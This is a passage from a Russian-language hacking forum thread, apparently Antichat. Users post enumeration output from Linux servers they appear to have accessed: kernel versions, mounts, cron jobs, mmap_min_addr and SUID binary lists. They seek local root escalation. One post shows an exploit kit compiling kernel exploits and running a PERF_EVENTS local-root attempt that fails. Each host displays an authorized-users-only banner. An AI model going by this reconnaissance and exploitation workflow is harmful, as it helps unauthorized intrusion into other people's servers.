    -rwxr-xr-x  1 root root   48600 2015-01-27 20:33:48.000000000 +0300 libcrypt-2.5.so
    lrwxrwxrwx  1 root root      15 2015-01-28 18:11:22.000000000 +0300 libcrypt.so.1 -> libcrypt-2.5.so
    -rwxr-xr-x  1 root root 1369312 2015-05-12 23:58:28.000000000 +0300 libcrypto.so.0.9.8e
    lrwxrwxrwx  1 root root      14 2009-09-29 10:33:39.000000000 +0400 libcrypto.so.4 -> libcrypto.so.6
    lrwxrwxrwx  1 root root      19 2015-05-14 01:08:43.000000000 +0300 libcrypto.so.6 -> libcrypto.so.0.9.8e
    -rwxr-xr-x  1 root root  831880 2007-01-07 06:09:55.000000000 +0300 libdb-4.1.so
    -rwxr-xr-x  1 root root  927720 2007-01-07 06:09:55.000000000 +0300 libdb-4.2.so
    -rwxr-xr-x  1 root root 1008656 2010-07-12 20:09:33.000000000 +0400 libdb-4.3.so
    -rwxr-xr-x  1 root root  901352 2007-01-07 06:09:55.000000000 +0300 libdb_cxx-4.1.so
    -rwxr-xr-x  1 root root 1011880 2007-01-07 06:09:55.000000000 +0300 libdb_cxx-4.2.so
    lrwxrwxrwx  1 root root      18 2013-10-20 01:10:44.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x  1 root root  243288 2013-10-02 01:59:24.000000000 +0400 libdbus-1.so.3.4.0
    lrwxrwxrwx  1 root root      31 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2.so -> libdevmapper-event-lvm2.so.2.02
    -r-xr-xr-x  1 root root    6712 2014-09-17 21:57:55.000000000 +0400 libdevmapper-event-lvm2.so.2.02
    lrwxrwxrwx  1 root root      46 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so
    lrwxrwxrwx  1 root root      48 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so
    -r--r--r--  1 root root   64678 2014-11-18 13:10:58.000000000 +0300 libdevmapper-event.a
    lrwxrwxrwx  1 root root      26 2014-11-19 01:08:46.000000000 +0300 libdevmapper-event.so -> libdevmapper-event.so.1.02
    -r-xr-xr-x  1 root root   21856 2014-11-18 13:11:03.000000000 +0300 libdevmapper-event.so.1.02
    -r--r--r--  1 root root  717500 2014-11-18 13:10:52.000000000 +0300 libdevmapper.a
    lrwxrwxrwx  1 root root      20 2014-11-19 01:08:46.000000000 +0300 libdevmapper.so -> libdevmapper.so.1.02
    -r-xr-xr-x  1 root root  154640 2014-11-18 13:11:03.000000000 +0300 libdevmapper.so.1.02
    -rwxr-xr-x  1 root root   23360 2015-01-27 20:33:49.000000000 +0300 libdl-2.5.so
    lrwxrwxrwx  1 root root      12 2015-01-28 18:11:22.000000000 +0300 libdl.so.2 -> libdl-2.5.so
    lrwxrwxrwx  1 root root      34 2011-09-15 01:15:02.000000000 +0400 libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc13
    -rwxr-xr-x  1 root root   22256 2011-07-22 09:07:30.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13
    -r-xr-xr-x  1 root root   22256 2011-07-22 09:07:30.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13-17
    lrwxrwxrwx  1 root root      23 2011-09-15 01:15:02.000000000 +0400 libdmraid.so -> libdmraid.so.1.0.0.rc13
    -rwxr-xr-x  1 root root  212736 2011-07-22 09:07:30.000000000 +0400 libdmraid.so.1.0.0.rc13
    -r-xr-xr-x  1 root root  215256 2011-07-22 09:07:30.000000000 +0400 libdmraid.so.1.0.0.rc13-17
    lrwxrwxrwx  1 root root      13 2014-10-01 01:10:44.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x  1 root root   26424 2014-09-18 14:12:06.000000000 +0400 libe2p.so.2.3
    lrwxrwxrwx  1 root root      17 2012-06-14 01:12:05.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0
    -rwxr-xr-x  1 root root  144344 2012-06-13 18:35:35.000000000 +0400 libexpat.so.0.5.0
    lrwxrwxrwx  1 root root      16 2014-10-01 01:10:44.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x  1 root root  122296 2014-09-18 14:12:06.000000000 +0400 libext2fs.so.2.4
    -rwxr-xr-x  1 root root   58400 2014-09-18 05:58:04.000000000 +0400 libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx  1 root root      28 2014-10-01 01:10:09.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx  1 root root      23 2009-09-29 10:33:39.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root  647608 2009-03-25 04:47:43.000000000 +0300 libglib-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:33:39.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   13520 2009-03-25 04:47:43.000000000 +0300 libgmodule-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:33:39.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root  262904 2009-03-25 04:47:43.000000000 +0300 libgobject-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:33:39.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   19176 2009-03-25 04:47:43.000000000 +0300 libgthread-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   31576 2007-03-15 06:16:08.000000000 +0300 libiw.so.28
    -rwxr-xr-x  1 root root    9472 2007-01-06 10:55:38.000000000 +0300 libkeyutils-1.2.so
    lrwxrwxrwx  1 root root      18 2009-09-29 10:33:39.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so
    -r--r--r--  1 root root 5902120 2014-09-17 21:57:53.000000000 +0400 liblvm2cmd.a
    lrwxrwxrwx  1 root root      18 2014-10-01 01:10:52.000000000 +0400 liblvm2cmd.so -> liblvm2cmd.so.2.02
    -r-xr-xr-x  1 root root  804632 2014-09-17 21:57:55.000000000 +0400 liblvm2cmd.so.2.02
    -rwxr-xr-x  1 root root  614992 2015-01-27 20:33:49.000000000 +0300 libm-2.5.so
    lrwxrwxrwx  1 root root      11 2015-01-28 18:11:22.000000000 +0300 libm.so.6 -> libm-2.5.so
    -rwxr-xr-x  1 root root  114352 2015-01-27 20:33:49.000000000 +0300 libnsl-2.5.so
    lrwxrwxrwx  1 root root      13 2015-01-28 18:11:22.000000000 +0300 libnsl.so.1 -> libnsl-2.5.so
    -rwxr-xr-x  1 root root   43128 2015-01-27 20:33:49.000000000 +0300 libnss_compat-2.5.so
    lrwxrwxrwx  1 root root      20 2015-01-28 18:11:22.000000000 +0300 libnss_compat.so.2 -> libnss_compat-2.5.so
    -rwxr-xr-x  1 root root  799680 2015-01-05 13:12:31.000000000 +0300 libnss_db-2.2.so
    lrwxrwxrwx  1 root root      16 2015-01-06 01:08:40.000000000 +0300 libnss_db.so.2 -> libnss_db-2.2.so
    -rwxr-xr-x  1 root root   23736 2015-01-27 20:33:49.000000000 +0300 libnss_dns-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:22.000000000 +0300 libnss_dns.so.2 -> libnss_dns-2.5.so
    -rwxr-xr-x  1 root root   53880 2015-01-27 20:33:49.000000000 +0300 libnss_files-2.5.so
    lrwxrwxrwx  1 root root      19 2015-01-28 18:11:22.000000000 +0300 libnss_files.so.2 -> libnss_files-2.5.so
    -rwxr-xr-x  1 root root   24736 2015-01-27 20:33:49.000000000 +0300 libnss_hesiod-2.5.so
    lrwxrwxrwx  1 root root      20 2015-01-28 18:11:22.000000000 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
    -rwxr-xr-x  1 root root 3185264 2015-06-15 15:38:14.000000000 +0300 libnss_ldap-2.5.so
    lrwxrwxrwx  1 root root      18 2015-06-16 01:09:08.000000000 +0300 libnss_ldap.so.2 -> libnss_ldap-2.5.so
    -rwxr-xr-x  1 root root   53544 2015-01-27 20:33:49.000000000 +0300 libnss_nis-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:22.000000000 +0300 libnss_nis.so.2 -> libnss_nis-2.5.so
    -rwxr-xr-x  1 root root   62944 2015-01-27 20:33:49.000000000 +0300 libnss_nisplus-2.5.so
    lrwxrwxrwx  1 root root      21 2015-01-28 18:11:22.000000000 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
    lrwxrwxrwx  1 root root      16 2015-05-28 01:08:58.000000000 +0300 libpam.so.0 -> libpam.so.0.81.5
    -rwxr-xr-x  1 root root   46800 2015-05-27 16:48:51.000000000 +0300 libpam.so.0.81.5
    lrwxrwxrwx  1 root root      21 2015-05-28 01:08:58.000000000 +0300 libpam_misc.so.0 -> libpam_misc.so.0.81.2
    -rwxr-xr-x  1 root root   13456 2015-05-27 16:48:51.000000000 +0300 libpam_misc.so.0.81.2
    lrwxrwxrwx  1 root root      17 2015-05-28 01:08:58.000000000 +0300 libpamc.so.0 -> libpamc.so.0.81.0
    -rwxr-xr-x  1 root root   11264 2015-05-27 16:48:51.000000000 +0300 libpamc.so.0.81.0
    lrwxrwxrwx  1 root root      16 2013-10-20 01:10:04.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x  1 root root  129984 2013-10-01 22:15:48.000000000 +0400 libpcre.so.0.0.1
    -rwxr-xr-x  1 root root   61248 2013-10-02 00:37:04.000000000 +0400 libproc-3.2.7.so
    -rwxr-xr-x  1 root root  149968 2015-01-27 20:33:50.000000000 +0300 libpthread-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:22.000000000 +0300 libpthread.so.0 -> libpthread-2.5.so
    -rwxr-xr-x  1 root root   92816 2015-01-27 20:33:50.000000000 +0300 libresolv-2.5.so
    lrwxrwxrwx  1 root root      16 2015-01-28 18:11:22.000000000 +0300 libresolv.so.2 -> libresolv-2.5.so
    -rwxr-xr-x  1 root root   53448 2015-01-27 20:33:50.000000000 +0300 librt-2.5.so
    lrwxrwxrwx  1 root root      12 2015-01-28 18:11:22.000000000 +0300 librt.so.1 -> librt-2.5.so
    -rwxr-xr-x  1 root root   95464 2011-03-06 07:48:31.000000000 +0300 libselinux.so.1
    -rwxr-xr-x  1 root root  159592 2009-09-04 02:47:06.000000000 +0400 libsemanage.so.1
    -rwxr-xr-x  1 root root  247496 2010-03-31 12:17:32.000000000 +0400 libsepol.so.1
    lrwxrwxrwx  1 root root      12 2014-10-01 01:10:44.000000000 +0400 libss.so.2 -> libss.so.2.0
    -rwxr-xr-x  1 root root   26688 2014-09-18 14:12:06.000000000 +0400 libss.so.2.0
    -rwxr-xr-x  1 root root  323528 2015-05-12 23:58:28.000000000 +0300 libssl.so.0.9.8e
    lrwxrwxrwx  1 root root      11 2009-09-29 10:33:39.000000000 +0400 libssl.so.4 -> libssl.so.6
    lrwxrwxrwx  1 root root      16 2015-05-14 01:08:43.000000000 +0300 libssl.so.6 -> libssl.so.0.9.8e
    lrwxrwxrwx  1 root root      19 2009-09-29 10:33:39.000000000 +0400 libtermcap.so.2 -> libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   15584 2007-01-06 19:58:47.000000000 +0300 libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   36200 2015-01-27 20:33:50.000000000 +0300 libthread_db-1.0.so
    lrwxrwxrwx  1 root root      19 2015-01-28 18:11:22.000000000 +0300 libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x  1 root root   18152 2015-01-27 20:33:50.000000000 +0300 libutil-2.5.so
    lrwxrwxrwx  1 root root      14 2015-01-28 18:11:22.000000000 +0300 libutil.so.1 -> libutil-2.5.so
    lrwxrwxrwx  1 root root      14 2014-10-01 01:10:44.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
    -rwxr-xr-x  1 root root   17936 2014-09-18 14:12:06.000000000 +0400 libuuid.so.1.2
    lrwxrwxrwx  1 root root      22 2014-10-01 01:11:15.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0
    -rwxr-xr-x  1 root root   33792 2014-09-17 22:43:42.000000000 +0400 libvolume_id.so.0.66.0
    lrwxrwxrwx  1 root root      16 2009-10-23 01:10:41.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
    -rwxr-xr-x  1 root root   37368 2009-09-22 02:29:33.000000000 +0400 libwrap.so.0.7.6
    lrwxrwxrwx  1 root root      13 2013-01-18 01:13:05.000000000 +0400 libz.so -> libz.so.1.2.3
    lrwxrwxrwx  1 root root      13 2013-01-18 01:11:17.000000000 +0400 libz.so.1 -> libz.so.1.2.3
    -rwxr-xr-x  1 root root   85544 2012-07-17 12:32:04.000000000 +0400 libz.so.1.2.3
    drwxr-xr-x  2 root root    4096 2015-01-28 18:11:22.000000000 +0300 rtkaio
    drwxr-xr-x  4 root root    4096 2015-06-16 01:09:08.000000000 +0300 security
    mount
    Code:
    /dev/sda5 on / type ext3 (rw,usrquota)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    /dev/sda8 on /home type ext3 (rw,nosuid,noatime,usrquota,grpquota)
    /dev/sda3 on /usr type ext3 (rw,usrquota,grpquota)
    /dev/sda2 on /var type ext3 (rw,nosuid,usrquota,grpquota)
    /dev/sda1 on /boot type ext3 (rw)
    tmpfs on /dev/shm type tmpfs (rw,noexec,nosuid,nodev)
    none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1G,nr_inodes=256k)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /tmp on /tmp type none (rw,noexec,nosuid,bind)
    cat /etc/issue
    Code:
    This computer system is for authorized users only. Individuals using this
    system without authority or in excess of their authority are subject to
    having all their activities on this system monitored and recorded or
    examined by any authorized person, including law enforcement, as system
    personnel deem appropriate. In the course of monitoring individuals
    improperly using the system or in the course of system maintenance, the
    activities of authorized users may also be monitored and recorded. Any
    material so recorded may be disclosed as appropriate. Anyone using this
    system consents to these terms.
    cat /etc/crontab
    Code:
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    
    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly
    ls -la /etc/cron.hourly
    Code:
    -rwxr-xr-x   1 root root  1683 Nov 21  2014 check_raid_status
    -rwxr-xr-x   1 root root   390 May 18  2011 mcelog.cron
    ls -la /etc/cron.daily
    Code:
    -rwxr-xr-x   1 root       root    379 Mar 28  2007 0anacron
    lrwxrwxrwx   1 root       root     39 Jan 18  2013 0logwatch -> /usr/share/logwatch/scripts/logwatch.pl
    -rwxr-xr-x   1 root       root    118 Jan 20 20:14 cups
    -rwxr-xr-x   1 root       root    219 Jun  6  2013 logrotate
    -rwxr-xr-x   1 root       root    418 May 30  2012 makewhatis.cron
    -rwxr-xr-x   1 root       root    137 Sep  3  2009 mlocate.cron
    -rwxr-xr-x   1 root       root   2181 Jun 21  2006 prelink
    -rwxr-xr-x   1 root       root   1746 May 14  2012 rkhunter
    -rwxr-xr-x   1 adegtyarev wheel   322 Sep 17  2013 rpaf_ips
    -rwxr-xr-x   1 root       root    296 Dec  9  2014 rpm
    -rwxr-xr-x   1 root       root    354 Aug 11  2010 tmpwatch
    ls -la /etc/cron.monthly
    Code:
    -rwxr-xr-x   1 root root   381 Mar 28  2007 0anacron
    ls -la /etc/cron.weekly
    Code:
    -rwxr-xr-x   1 root root   380 Mar 28  2007 0anacron
    -rwxr-xr-x   1 root root  2843 Jan  9  2013 99-raid-check
    -rwxr-xr-x   1 root root   414 May 30  2012 makewhatis.cron
    cat /proc/version
    Code:
    Linux version 2.6.18-400.1.1.el5 ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-55)) #1 SMP Thu Dec 18 00:59:53 EST 2014
    cat /proc/sys/vm/mmap_min_addr
    Code:
    4096
    pwd
    ls -la /usr/bin/staprun
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    Code:
    -rwsr-x--- 1 root dbus 48152 Oct  2  2013 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 61656 Nov  8  2012 /bin/mount
    -rwsr-x--- 1 root wheel 28336 Mar 21  2012 /bin/su
    -rwsr-xr-x 1 root root 41592 Nov  8  2012 /bin/umount
    -rwsr-xr-x 1 root root 2078708 Feb 22  2012 /opt/suphp/sbin/suphp
    -rwsr-xr-x 1 root root 19768 May 27 16:48 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 75504 May  6 12:41 /sbin/umount.nfs4
    -rwsr-xr-x 1 root root 75504 May  6 12:41 /sbin/umount.nfs
    -rwsr-xr-x 1 root root 75496 May  6 12:41 /sbin/mount.nfs
    -rwsr-x--- 1 root ecryptfs 19824 Feb 23  2012 /sbin/mount.ecryptfs_private
    -rwsr-xr-x 1 root root 75504 May  6 12:41 /sbin/mount.nfs4
    -rwsr-xr-x 1 root root 14112 May 27 16:48 /sbin/pam_timestamp_check
    -rwsr-xr-x 1 root root 176616 Feb 22  2012 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 1166176 Oct 25  2012 /usr/sbin/exim
    -rwsr-xr-x 1 root root 8848 Sep 22  2014 /usr/sbin/usernetctl
    -rwsr-xr-x 1 root root 200671 Sep 22  2014 /usr/kerberos/bin/ksu
    -rwsr-xr-x 1 root root 28584 Sep 17  2014 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 120784 Oct  2  2009 /usr/bin/incrontab
    -rwsr-xr-x 1 root root 51752 Sep 17  2014 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 50696 Sep 17  2014 /usr/bin/chage
    -rwsr-sr-x 1 root root 315640 Feb 23  2012 /usr/bin/crontab
    ---s--x--x 2 root root 190912 Mar 10  2014 /usr/bin/sudoedit
    -rwsr-xr-x 1 root root 75264 Jan  9  2013 /usr/bin/quota
    -rwsr-xr-x 1 root root 15552 Nov  7  2011 /usr/bin/rlogin
    -rwsr-xr-x 1 root root 27936 Aug 11  2010 /usr/bin/passwd
    ---s--x--x 2 root root 190912 Mar 10  2014 /usr/bin/sudo
    -rwsr-xr-x 1 root root 20384 Nov  7  2011 /usr/bin/rcp
    -rwsr-xr-x 1 root root 49392 Oct  8  2014 /usr/bin/at
    -rws--x--x 1 root root 22200 Nov  8  2012 /usr/bin/chfn
    -rwsr-xr-x 1 root root 11328 Nov  7  2011 /usr/bin/rsh
    -rwsr-xr-x 1 root root 18606 Feb 22  2012 /usr/local/apache/bin/suexec
    -rwsr-xr-x 1 root root 18606 Feb 22  2012 /usr/local/apache.backup/bin/suexec
     
  4. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    semtex.c не берет
    Code:
    
    $ uname -a
    Linux host.com 2.6.32-358.14.1.el6.x86_64 #1 SMP Tue Jul 16 23:51:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
    $ ls -la /boot
    total 49531
    dr-xr-xr-x.  5 root root  1024 Jul 19  2013 .
    dr-xr-xr-x. 23 root root  4096 Jul  9 08:33 ..
    -rw-r--r--.  1 root root  171 Jul 17  2013 .vmlinuz-2.6.32-358.14.1.el6.x86_64.hmac
    -rw-r--r--.  1 root root  166 Feb 22  2013 .vmlinuz-2.6.32-358.el6.x86_64.hmac
    -rw-r--r--.  1 root root  2408392 Jul 17  2013 System.map-2.6.32-358.14.1.el6.x86_64
    -rw-r--r--.  1 root root  2407466 Feb 22  2013 System.map-2.6.32-358.el6.x86_64
    -rw-r--r--.  1 root root  104086 Jul 17  2013 config-2.6.32-358.14.1.el6.x86_64
    -rw-r--r--.  1 root root  104081 Feb 22  2013 config-2.6.32-358.el6.x86_64
    drwxr-xr-x.  3 root root  1024 Jul 19  2013 efi
    drwxr-xr-x.  2 root root  1024 Oct 15  2014 grub
    -rw-r--r--.  1 root root 16210951 Jul 19  2013 initramfs-2.6.32-358.14.1.el6.x86_64.img
    -rw-r--r--.  1 root root 16206526 Jul 19  2013 initramfs-2.6.32-358.el6.x86_64.img
    -rw-------  1 root root  4563905 Apr 16 02:54 initrd-2.6.32-358.14.1.el6.x86_64kdump.img
    drwx------.  2 root root  12288 Jul 19  2013 lost+found
    -rw-r--r--.  1 root root  185902 Jul 17  2013 symvers-2.6.32-358.14.1.el6.x86_64.gz
    -rw-r--r--.  1 root root  185734 Feb 22  2013 symvers-2.6.32-358.el6.x86_64.gz
    -rwxr-xr-x.  1 root root  4045680 Jul 17  2013 vmlinuz-2.6.32-358.14.1.el6.x86_64
    -rwxr-xr-x.  1 root root  4043888 Feb 22  2013 vmlinuz-2.6.32-358.el6.x86_64
    $ lls -la --full-time /lib
    
    $ lls -la --full-time /lib64
    
    $ mount
    /dev/sda2 on / type ext4 (rw,usrjquota=quota.user,jqfmt=vfsv0)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/sda1 on /boot type ext2 (rw)
    /dev/sda4 on /tmp type ext4 (rw,noexec,nosuid,nodev)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /tmp on /var/tmp type none (rw,noexec,nosuid,bind)
    $ df -h
    Filesystem  Size  Used Avail Use% Mounted on
    /dev/sda2  2.7T  631G  2.0T  25% /
    tmpfs  7.8G  0  7.8G  0% /dev/shm
    /dev/sda1  97M  51M  42M  55% /boot
    /dev/sda4  2.0G  84M  1.8G  5% /tmp
    $ cat /etc/issue
    This computer system is for authorized users only. Individuals using this
    system without authority or in excess of their authority are subject to
    having all their activities on this system monitored and recorded or
    examined by any authorized person, including law enforcement, as system
    personnel deem appropriate. In the course of monitoring individuals
    improperly using the system or in the course of system maintenance, the
    activities of authorized users may also be monitored and recorded. Any
    material so recorded may be disclosed as appropriate. Anyone using this
    system consents to these terms.
    
    $ cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    
    # For details see man 4 crontabs
    
    # Example of job definition:
    # .---------------- minute (0 - 59)
    # |  .------------- hour (0 - 23)
    # |  |  .---------- day of month (1 - 31)
    # |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
    # |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # |  |  |  |  |
    # *  *  *  *  * user-name command to be executed
    
    $ ls -la cron.d,
    
    $ ls -la cron.d
    
    $ ls -la cron.hourly
    
    $ ls -la cron.weekly
    
    $ cat /proc/version
    Linux version 2.6.32-358.14.1.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) ) #1 SMP Tue Jul 16 23:51:20 UTC 2013
    $ cat /proc/sys/vm/mmap_min_addr
    4096
    
    $ ls -la /usr/bin/staprun
    ---s--x--- 1 root stapusr 183072 Oct 15  2014 /usr/bin/staprun
    $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    -rws--x--x 1 root root 14280 May 27 17:00 /usr/libexec/pt_chown
    -rwsr-xr-x 1 abrt abrt 10296 Oct 16  2014 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
    -rwsr-xr-x 1 root root 257824 Nov 13  2014 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 14368 Oct 15  2014 /usr/libexec/polkit-1/polkit-agent-helper-1
    -rwsr-xr-x 1 root root 19768 Dec 20  2014 /usr/local/apache/bin/suexec
    -rwsr-xr-x 1 root root 19768 Dec 20  2014 /usr/local/apache.backup/bin/suexec
    -rws--x--x 1 root root 20184 Oct 15  2014 /usr/bin/chfn
    -rwsr-xr-x 1 root root 66352 Apr  7 11:52 /usr/bin/chage
    -rwsr-xr-x 1 root root 82752 Mar 19  2014 /usr/bin/quota
    -rwsr-xr-x 1 root root 71480 Apr  7 11:52 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 54336 Oct 18  2014 /usr/bin/at
    -rwsr-xr-x 1 root root 22544 Oct 15  2014 /usr/bin/pkexec
    ---s--x--- 1 root stapusr 183072 Oct 15  2014 /usr/bin/staprun
    -rwsr-xr-x. 1 root root 30768 Feb 22  2012 /usr/bin/passwd
    -rwsr-xr-x 1 root root 36144 Apr  7 11:52 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 51784 Nov 23  2013 /usr/bin/crontab
    
    Compiling exp_abacus.c...OK.   
    Compiling exp_cheddarbay.c...OK.   
    Compiling exp_ingom0wnar.c...OK.   
    Compiling exp_moosecox.c...OK.   
    Compiling exp_paokara.c...OK.   
    Compiling exp_powerglove.c...OK.   
    Compiling exp_sieve.c...OK.   
    Compiling exp_therebel.c...OK.   
    Compiling exp_vmware.c...failed.   
    Compiling exp_wunderbar.c...OK.   
    Choose your exploit:   
     [0] Abacus: Linux 2.6.37 -> 3.8.8 PERF_EVENTS local root   
     [1] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)   
     [2] Sieve: Linux 2.6.18+ move_pages() infoleak   
     [3] Exit   
    > 0   
     ------------------------------------------------------------------------------   
     The limits of my language are the limits of my mind.  All I know is what I   
     have words for. --Wittgenstein   
     ------------------------------------------------------------------------------   
     [+] Resolved set_fs_root to 0xffffffff811b3030 (via System.map)   
     [+] Resolved set_fs_pwd to 0xffffffff811b2fc0 (via System.map)   
     [+] Resolved __virt_addr_valid to 0xffffffff8104bc90 (via System.map)   
     [+] Resolved init_task to 0xffffffff81a8d020 (via System.map)   
     [+] Resolved init_fs to 0xffffffff81ad4c40 (via System.map)   
     [+] Resolved default_exec_domain to 0xffffffff81a9a8a0 (via System.map)   
     [+] Resolved bad_file_ops to 0xffffffff81621300 (via System.map)   
     [+] Resolved bad_file_aio_read to 0xffffffff8119e9e0 (via System.map)   
     [+] Resolved ima_audit to 0xffffffff81fd4c7c (via System.map)   
     [+] Resolved ima_file_mmap to 0xffffffff8123fa00 (via System.map)   
     [+] Resolved ima_bprm_check to 0xffffffff8123f9c0 (via System.map)   
     [+] Resolved ima_file_check to 0xffffffff8123f990 (via System.map)   
     [+] Resolved selinux_enforcing to 0xffffffff81fd04c4 (via System.map)   
     [+] Resolved selinux_enabled to 0xffffffff81ae2880 (via System.map)   
     [+] Resolved security_ops to 0xffffffff81fcec58 (via System.map)   
     [+] Resolved default_security_ops to 0xffffffff81aded00 (via System.map)   
     [+] Resolved sel_read_enforce to 0xffffffff8122c120 (via System.map)   
     [+] Resolved audit_enabled to 0xffffffff81ed6ac4 (via System.map)   
     [+] Resolved commit_creds to 0xffffffff8109e5c0 (via System.map)   
     [+] Resolved prepare_kernel_cred to 0xffffffff8109e840 (via System.map)   
     [+] Resolved xen_start_info to 0xffffffff81ddf308 (via System.map)   
     [+] Resolved ptmx_fops to 0xffffffff81fdda60 (via System.map)   
     [+] Resolved mark_rodata_ro to 0xffffffff810459f0 (via System.map)   
     [+] Resolved set_kernel_text_ro to 0xffffffff81045b80 (via System.map)   
     [+] Resolved make_lowmem_page_readonly to 0xffffffff81005770 (via System.map)   
     [+] Resolved make_lowmem_page_readwrite to 0xffffffff81005720 (via System.map)   
     [!] Securely probing with great effort   
     [-] System rejected creation of perf event.  Either this system is patched, or a previous failed exploit was run against it. 
    
    
     
    _________________________
    #584 grimnir, 15 Jul 2015
    Last edited: 15 Jul 2015
  5. slalix

    slalix New Member

    Joined:
    14 Feb 2014
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Помогите разобраться с сие машинкой:

    Code:
    Linux srv007 2.6.32-5-amd64 #1 SMP Sun Sep 23 10:07:46 UTC 2012 x86_64 GNU/Linux
    Code:
    /dev/sda2 on / type ext3 (rw,noatime,errors=remount-ro)
    tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
    udev on /dev type tmpfs (rw,mode=0755)
    tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
    devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
    /dev/sda1 on /boot type ext3 (rw,noatime)
    /dev/sda6 on /home type ext3 (rw,nosuid,nodev,noatime,usrquota)
    /dev/sda5 on /var type ext3 (rw,noatime)
    Code:
    Debian GNU/Linux 6.0 \n \l
    Code:
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user    command
    17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    Code:
    65536
    Code:
    total 16
    drwxr-xr-x   2 root root 4096 Dec 23  2014 .
